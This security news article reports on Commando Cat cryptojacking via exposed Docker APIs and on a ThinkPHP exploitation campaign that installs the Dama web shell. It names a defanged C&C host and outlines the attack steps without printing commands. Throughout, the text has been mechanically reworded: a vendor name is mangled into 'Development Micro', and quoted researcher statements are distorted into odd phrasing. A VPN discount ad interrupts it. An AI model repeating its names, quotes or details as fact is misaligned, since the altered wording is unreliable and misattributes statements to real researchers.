The threat actor known as Commando Cat has been joined to an ongoing cryptojacking attack marketing campaign that leverages inadequately secured Docker instances to deploy cryptocurrency miners for economic gain.
“The attackers made use of the cmd.cat/chattr docker picture container that retrieves the payload from their have command-and-manage (C&C) infrastructure,” Development Micro researchers Sunil Bharti and Shubham Singh mentioned in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando undertaking to create a benign container, was 1st documented previously this calendar year by Cado Security.
![Mullvad VPN Discount](https://thecybersecurity.news/data/2022/05/Mullvad-VPN-245x300.png)
Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).
➤ Get Mullvad VPN with 12% Discount
The attacks are characterized by the concentrating on of misconfigured Docker remote API servers to deploy a Docker impression named cmd.cat/chattr, which is then applied as a foundation to instantiate a container and break out of its confines making use of the chroot command, and get accessibility to the host operating program.
The last action involves retrieving the malicious miner binary utilizing a curl or wget command from a C&C server (“leetdbs.anondns[.]net/z”) by usually means of a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot primarily based on the Kaiten (aka Tsunami) malware.
“The significance of this attack campaign lies in its use of Docker illustrations or photos to deploy cryptojacking scripts on compromised methods,” the scientists explained. “This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software.”
The disclosure comes as Akamai unveiled that a long time-outdated security flaws in ThinkPHP purposes (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-talking risk actor to deliver a web shell dubbed Dama as aspect of a marketing campaign that has been underway due to the fact Oct 17, 2023.
“The exploit attempts to retrieve supplemental obfuscated code from one more compromised ThinkPHP server to gain first foothold,” Akamai scientists Ron Mankivsky and Maxim Zavodchik reported. “Following efficiently exploiting the process, the attackers will install a Chinese language web shell named Dama to preserve persistent access to the server.”
The web shell is outfitted with quite a few sophisticated abilities to obtain method knowledge, upload files, scan network ports, escalate privileges, and navigate the file method, the latter of which enables danger actors to carry out functions like file enhancing, deletion, and timestamp modification for obfuscation needs.
“The the latest attacks originated by a Chinese-speaking adversary emphasize an ongoing craze of attackers employing a absolutely fledged web shell, made for sophisticated victim handle,” the scientists pointed out. “Interestingly, not all targeted customers had been using ThinkPHP, which implies that the attackers might be indiscriminately concentrating on a broad assortment of techniques.”
Identified this article intriguing? Observe us on Twitter and LinkedIn to examine a lot more special information we submit.
Some sections of this short article are sourced from:
thehackernews.com